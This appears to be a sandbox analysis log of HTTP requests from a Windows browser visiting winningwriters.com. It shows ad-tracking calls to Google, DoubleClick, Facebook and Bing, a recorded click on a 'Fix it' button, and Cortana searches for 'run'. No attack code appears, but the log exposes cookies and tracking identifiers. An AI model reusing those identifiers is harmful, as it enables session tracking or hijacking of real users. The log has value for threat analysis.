          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960054416&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dAlGSLiJP-Qjr9JOfn8ETYLVgnlZDbke1AT-skAwr3dhPo1w8&random=496013729&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960062417&cv=11&fst=1731960062417&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960062417&cv=11&fst=1731960062417&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960062417&cv=11&fst=1731960062417&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960062417&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dS7k7_0jcGBwOgTVtZMCkVFZjrhg0s_CozCiw-wz_uLvGvt4K&random=1057389064&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /tr/?id=188856481728275&ev=SubscribedButtonClick&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960063857&cd[buttonFeatures]=%7B%22classList%22%3A%22button%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22fixItBtn%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Fix%20it%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Fix%20it&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.177&r=stable&ec=1&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&es=automatic&tm=3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=188856481728275&ev=SubscribedButtonClick&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960063857&cd[buttonFeatures]=%7B%22classList%22%3A%22button%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22fixItBtn%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Fix%20it%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Fix%20it&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.177&r=stable&ec=1&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&es=automatic&tm=3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source;navigation-source, triggerReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960062417&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dS7k7_0jcGBwOgTVtZMCkVFZjrhg0s_CozCiw-wz_uLvGvt4K&random=1057389064&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /tr/?id=188856481728275&ev=SubscribedButtonClick&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960063857&cd[buttonFeatures]=%7B%22classList%22%3A%22button%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22fixItBtn%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Fix%20it%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Fix%20it&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.177&r=stable&ec=1&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&es=automatic&tm=3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=188856481728275&ev=SubscribedButtonClick&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960063857&cd[buttonFeatures]=%7B%22classList%22%3A%22button%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22fixItBtn%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Fix%20it%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Fix%20it&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.177&r=stable&ec=1&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&es=automatic&tm=3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitOrigin: https://www.bing.comAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
          Source: global trafficHTTP traffic detected: GET /rb/17/jnc,nj/6aa-EF2IAVwnTTOiwAbhwI_VmCw.js?bu=DygxeIQBiQGMAYEBe37GAckBMbkBMcwB&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=d05aa824&IPMID=1707317782133
          Source: global trafficHTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: fp.msedge.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /rb/1a/cir3,ortl,cc,nc/f4st08wpuYBQ5KWRJ3MqAsJB8zg.css?bu=C8AJpQOBBJwKgQnrCPQGXV1dXQ&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=d05aa824&IPMID=1707317782133
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960070417&cv=11&fst=1731960070417&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960070417&cv=11&fst=1731960070417&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-S2XE0RVPX9&gacid=723902191.1731960008&gtm=45je4be0v889608727z8846709124za200zb846709124&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067554~102067808~102077855~102081484&z=645652693 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /rb/1a/cir3,ortl,cc,nc/yy4SnZtT2-rfsZpLbcm-u8xyafQ.css?bu=B8YCSLQCmgFdXdEC&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=d05aa824&IPMID=1707317782133
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=r&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=9230273e6d2040ffa716abbaa2bf7694&ig=76db04e504974639adb25562a9af5663 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHX-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStoreX-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2X-MSEdge-ExternalExpType: JointCoordAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=d05aa824&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=run&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=9230273e6d2040ffa716abbaa2bf7694&ig=18926085f913425f9e257587ccad12a1 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHX-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStoreX-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2X-MSEdge-ExternalExpType: JointCoordAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=d05aa824&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
